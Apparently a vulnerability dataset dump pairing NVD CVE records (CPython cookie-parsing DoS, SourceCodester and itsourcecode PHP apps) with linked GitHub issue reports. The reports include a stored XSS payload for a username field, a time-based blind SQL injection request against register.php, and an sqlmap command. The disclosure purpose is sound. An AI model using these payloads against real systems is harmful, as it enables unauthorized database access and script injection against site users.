cve_id
stringlengths
13
16
cve_published
stringdate
2019-01-01 16:29:00
2025-02-25 20:15:37
cve_descriptions
stringlengths
34
2.6k
cve_metrics
dict
cve_references
listlengths
1
281
cve_configurations
listlengths
1
70
cve_cwe_list
listlengths
1
1
cve_primary_cwe
stringclasses
164 values
url
stringlengths
36
97
cve_tags
listlengths
1
5
domain
stringclasses
1 value
issue_owner_repo
listlengths
2
2
issue_body
stringlengths
0
198k
issue_title
stringlengths
1
335
issue_comments_url
stringlengths
55
116
issue_comments_count
int64
0
338
issue_created_at
stringdate
2012-06-06 09:34:24
2025-04-02 09:37:20
issue_updated_at
stringdate
2014-04-01 20:16:21
2025-06-16 12:26:58
issue_html_url
stringlengths
36
97
issue_github_id
int64
4.93M
2.97B
issue_number
int64
1
199k
__index_level_0__
int64
0
6.55k
CVE-2024-7592
2024-08-19T19:15:08.180
There is a LOW severity vulnerability affecting CPython, specifically the 'http.cookies' standard library module. When parsing cookies that contained backslashes for quoted characters in the cookie value, the parser would use an algorithm with quadratic complexity, resulting in excess CPU resources being used while parsing the value.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cna@python.org", "tags": [ "Patch" ], "url": "https://github.com/python/cpython/commit/391e5626e3ee5af267b97e37abc7475732e67621" }, { "source": "cna@python.org", "tags": [ "Patch" ], "url": "https://github.com/python/cpython/commit/44e458357fca05ca0ae2658d62c8c595b048b5ef" }, { "source": "cna@python.org", "tags": [ "Patch" ], "url": "https://github.com/python/cpython/commit/a77ab24427a18bff817025adb03ca920dc3f1a06" }, { "source": "cna@python.org", "tags": [ "Patch" ], "url": "https://github.com/python/cpython/commit/b2f11ca7667e4d57c71c1c88b255115f16042d9a" }, { "source": "cna@python.org", "tags": [ "Patch" ], "url": "https://github.com/python/cpython/commit/d4ac921a4b081f7f996a5d2b101684b67ba0ed7f" }, { "source": "cna@python.org", "tags": [ "Patch" ], "url": "https://github.com/python/cpython/commit/d662e2db2605515a767f88ad48096b8ac623c774" }, { "source": "cna@python.org", "tags": [ "Patch" ], "url": "https://github.com/python/cpython/commit/dcc3eaef98cd94d6cb6cb0f44bd1c903d04f33b1" }, { "source": "cna@python.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/python/cpython/issues/123067" }, { "source": "cna@python.org", "tags": [ "Issue Tracking", "Patch" ], "url": "https://github.com/python/cpython/pull/123075" }, { "source": "cna@python.org", "tags": [ "Mailing List" ], "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/HXJAAAALNUNGCQUS2W7WR6GFIZIHFOOK/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20241018-0006/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:python:python:*:*:*:*:*:*:*:*", "matchCriteriaId": "B475FA53-D1F3-44C8-80CD-0CEA88129109", "versionEndExcluding": "3.8.20", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:*:*:*:*:*:*:*:*", "matchCriteriaId": "9365E878-106E-49B6-98FC-9FA339CD5216", "versionEndExcluding": "3.9.20", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "3.9.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:*:*:*:*:*:*:*:*", "matchCriteriaId": "BFD756EB-DF07-4485-A2AA-59FBD7260A21", "versionEndExcluding": "3.10.15", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "3.10.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:*:*:*:*:*:*:*:*", "matchCriteriaId": "9EE0E5D8-452F-4862-9C23-23AC1DDEFB1E", "versionEndExcluding": "3.11.10", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "3.11.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:*:*:*:*:*:*:*:*", "matchCriteriaId": "5D4E662B-59E4-495E-941E-2246D2168B42", "versionEndExcluding": "3.12.6", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "3.12.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:3.13.0:alpha0:*:*:*:*:*:*", "matchCriteriaId": "3BA51E41-D221-431F-870F-536AF2867B50", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:3.13.0:alpha1:*:*:*:*:*:*", "matchCriteriaId": "978582FF-B8F3-479F-AE77-359E9AEE6F23", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:3.13.0:alpha2:*:*:*:*:*:*", "matchCriteriaId": "84E3F62C-7218-4DC3-8473-8A576739643A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:3.13.0:alpha3:*:*:*:*:*:*", "matchCriteriaId": "1FD15706-B8BC-4801-9F93-06771F2E12C1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:3.13.0:alpha4:*:*:*:*:*:*", "matchCriteriaId": "0FDC359F-E8ED-4777-83FB-1EC63F095CBF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:3.13.0:alpha5:*:*:*:*:*:*", "matchCriteriaId": "6893BDDE-4D90-4592-8701-C6B3FFEB0CFE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:3.13.0:alpha6:*:*:*:*:*:*", "matchCriteriaId": "E316F712-F03A-4378-8192-D1640819698B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:3.13.0:beta1:*:*:*:*:*:*", "matchCriteriaId": "8566F034-27CB-422E-950B-DCAA926CF64F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:3.13.0:beta2:*:*:*:*:*:*", "matchCriteriaId": "EACCE6C3-7701-4966-9D88-E949C82FCA46", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:3.13.0:beta3:*:*:*:*:*:*", "matchCriteriaId": "A4853BF2-9C27-465F-9840-5B37013C9F74", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:3.13.0:beta4:*:*:*:*:*:*", "matchCriteriaId": "B266541A-E877-4CAD-A1EF-08A069441F36", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:3.13.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "8384A34C-50CD-439C-A2BB-DEA6161342C1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "1333" ]
1333
https://github.com/python/cpython/issues/123067
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "python", "cpython" ]
# Bug report ### Bug description: ## Description A potential Denial of Service (DoS) vulnerability, identified as CVE-2024-7592, has been discovered in the `_unquote()` method of the `http.cookies` module in Python's standard library. This vulnerability is particularly concerning as it affects frameworks that utilize this method, including Django. ### Vulnerable Code The `_unquote()` function uses regular expressions `_OctalPatt` and `_QuotePatt` within a while loop to process input strings. The problematic patterns and their application can lead to exponential time complexity under certain conditions, akin to a Regular Expression Denial of Service (ReDoS) attack. ```python # http/cookies.py _OctalPatt = re.compile(r"\\[0-3][0-7][0-7]") _QuotePatt = re.compile(r"[\\].") def _unquote(str): # ... (code omitted for brevity) while 0 <= i < n: o_match = _OctalPatt.search(str, i) q_match = _QuotePatt.search(str, i) # ... (further processing) ``` ## Impact This vulnerability has also been verified in the Django framework, where the `parse_cookie()` function uses this method to process incoming cookie headers. This could potentially be exploited by sending specially crafted cookie values to trigger significant delays: - Cookie sizes of 8000+ bytes caused delays of approximately 0.15 seconds per HTTP request. - Cookie sizes of 20000+ bytes resulted in delays of about 1 second per request. While many environments limit HTTP request sizes, the specific limits vary, and in some cases, this vulnerability could be exploited. ### CPython versions tested on: CPython main branch ### Operating systems tested on: Linux <!-- gh-linked-prs --> ### Linked PRs * gh-123066 * gh-123075 * gh-123103 * gh-123104 * gh-123105 * gh-123106 * gh-123107 * gh-123108 <!-- /gh-linked-prs -->
CVE-2024-7592: Denial of Service Vulnerability in `http.cookies._unquote()`
https://api.github.com/repos/python/cpython/issues/123067/comments
6
2024-08-16T13:31:26Z
2024-09-04T15:50:52Z
https://github.com/python/cpython/issues/123067
2,470,285,353
123,067
6,198
CVE-2024-7929
2024-08-19T22:15:06.470
A vulnerability, which was classified as problematic, was found in SourceCodester Simple Forum Website 1.0. This affects an unknown part of the file /registration.php of the component Signup Page. The manipulation of the argument username leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 1.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 6.9, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "NONE", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/ulayaha/ulayaha.github.io/issues/2" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.275115" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.275115" }, { "source": "cna@vuldb.com", "tags": [ "Issue Tracking", "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.392325" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:oretnom23:simple_forum_website:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "0C9F288C-09B8-4C6A-879F-E21B7B48214C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/ulayaha/ulayaha.github.io/issues/2
[ "Exploit", "Issue Tracking" ]
github.com
[ "ulayaha", "ulayaha.github.io" ]
My screenshot of setting up the PHP project: ![网站搭建](https://github.com/user-attachments/assets/6ceed3b3-5e79-4e26-9f51-da50d6ebbff0) First, register a regular user, then name your username with the following attack payload: `"><img src=x onerror=alert(1)> ` ![创用户](https://github.com/user-attachments/assets/0425202a-8bbe-495e-b4d0-4e878375506c) Creating a regular user requires administrator approval. When the administrator approves in the backend, the XSS popup from the username will affect them. ![被打后台咯](https://github.com/user-attachments/assets/f7e61eef-e796-4979-9534-1c93567d3063)
XSS exists in the Simple Forum Website‘s user registration area
https://api.github.com/repos/ulayaha/ulayaha.github.io/issues/2/comments
1
2024-08-16T09:08:29Z
2024-08-22T09:48:27Z
https://github.com/ulayaha/ulayaha.github.io/issues/2
2,469,848,087
2
6,199
CVE-2024-7946
2024-08-20T02:15:06.097
A vulnerability was found in itsourcecode Online Blood Bank Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file register.php of the component User Signup. The manipulation of the argument user leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 6.9, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "NONE", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/a1175165157/cve/issues/1" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.275138" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.275138" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.393382" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:adonesevangelista:online_blood_bank_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "4F53F723-1E87-4190-A902-24A47378C80B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/a1175165157/cve/issues/1
[ "Exploit", "Issue Tracking" ]
github.com
[ "a1175165157", "cve" ]
# Itsourcecode "Online Blood Bank Management System" in PHP 1.0 "register.php" SQL injection # NAME OF AFFECTED PRODUCT(S) + Online Blood Bank Management System" in PHP ## Vendor Homepage + https://itsourcecode.com/free-projects/php-project/online-blood-bank-management-system-in-php-with-source-code/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + wangshuo,xuguangxia,lijiangfeng + Guangzhou University ## Vulnerable File + register.php ## VERSION(S) + V1.0 ## Software Link + https://itsourcecode.com/wp-content/uploads/2021/02/Blood-Bank-Management-System-in-Php-with-Source-Code-1.zip # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + A SQL injection vulnerability was found in the 'register.php' file of the 'Online Blood Bank Management System" in PHP' project. The reason for this issue is that attackers inject malicious code from the parameter "user" and use it directly in SQL queries without appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations. <img width="1047" alt="1" src="https://github.com/user-attachments/assets/0077b0aa-955d-4bba-85fd-45d8f3bbcba0"> ## Impact + Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION + Due to insufficient user input validation for the "user" parameter, a serious SQL injection vulnerability was discovered in the register function of the "Online Blood Bank Management System" in PHP", allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to the database, modify or delete data, and access sensitive information without logging in. Immediate remedial measures are needed to ensure system security and protect data integrity. # No login or authorization is required to exploit this vulnerability # Vulnerability details and POC ``` POST /register.php HTTP/1.1 Host: 192.168.0.103:1225 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 95 Origin: http://192.168.0.103:1225 Connection: close Referer: http://192.168.0.103:1225/signup.php Cookie: pma_lang=zh_CN; PHPSESSID=imr8rmlkh54u26vchbpf2b5qd1; phpMyAdmin=rj6mrnt4lq34hn658uongmp9qr; pmaUser-1=%7B%22iv%22%3A%22qjTt6oOV5NEWSxwBInV2Lg%3D%3D%22%2C%22mac%22%3A%225c7fe56108a609c4cb6eac0da8509b77d0cad421%22%2C%22payload%22%3A%22iTXdHC2Lk%2BINU6DFUtD%2Bcg%3D%3D%22%7D Upgrade-Insecure-Requests: 1 Priority: u=0, i tab=on&user=123&pass=123123&useremail=123123%40qwe.com&bloodgroup=321&gender=123123&sub=Sign+up ``` ## Vulnerability type: + time-based blind ## Vulnerability location: + 'user' parameter ## Payload: ``` Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: tab=on&user=123' AND (SELECT 5895 FROM (SELECT(SLEEP(5)))AOob) AND 'aqXr'='aqXr&pass=321321&useremail=123123@qwe.com&bloodgroup=321&gender=123123&sub=Sign up ``` <img width="713" alt="2" src="https://github.com/user-attachments/assets/8eaf9f36-29f2-4870-81bf-93caf3e766ca"> ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: ```bash sqlmap -r 123 --batch --dbs ``` <img width="616" alt="3" src="https://github.com/user-attachments/assets/d16b4eb4-2222-49dd-95f3-c58fdd03cdc6"> # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. **Input validation and filtering:** Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
Itsourcecode "Online Blood Bank Management System" in PHP 1.0 "register.php" SQL injection
https://api.github.com/repos/a1175165157/cve/issues/1/comments
0
2024-08-18T08:57:36Z
2024-08-18T09:02:31Z
https://github.com/a1175165157/cve/issues/1
2,471,866,573
1
6,200
CVE-2024-7947
2024-08-20T02:15:06.337
A vulnerability classified as critical has been found in SourceCodester Point of Sales and Inventory Management System 1.0. This affects an unknown part of the file login.php. The manipulation of the argument email leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 6.9, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "NONE", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/CveSecLook/cve/issues/60" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.275139" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.275139" }, { "source": "cna@vuldb.com", "tags": [ "Issue Tracking", "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.393525" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:janobe:point_of_sales_and_inventory_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "BB4CAA5E-2FA9-4FCB-A2C2-B4D4E4D73896", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
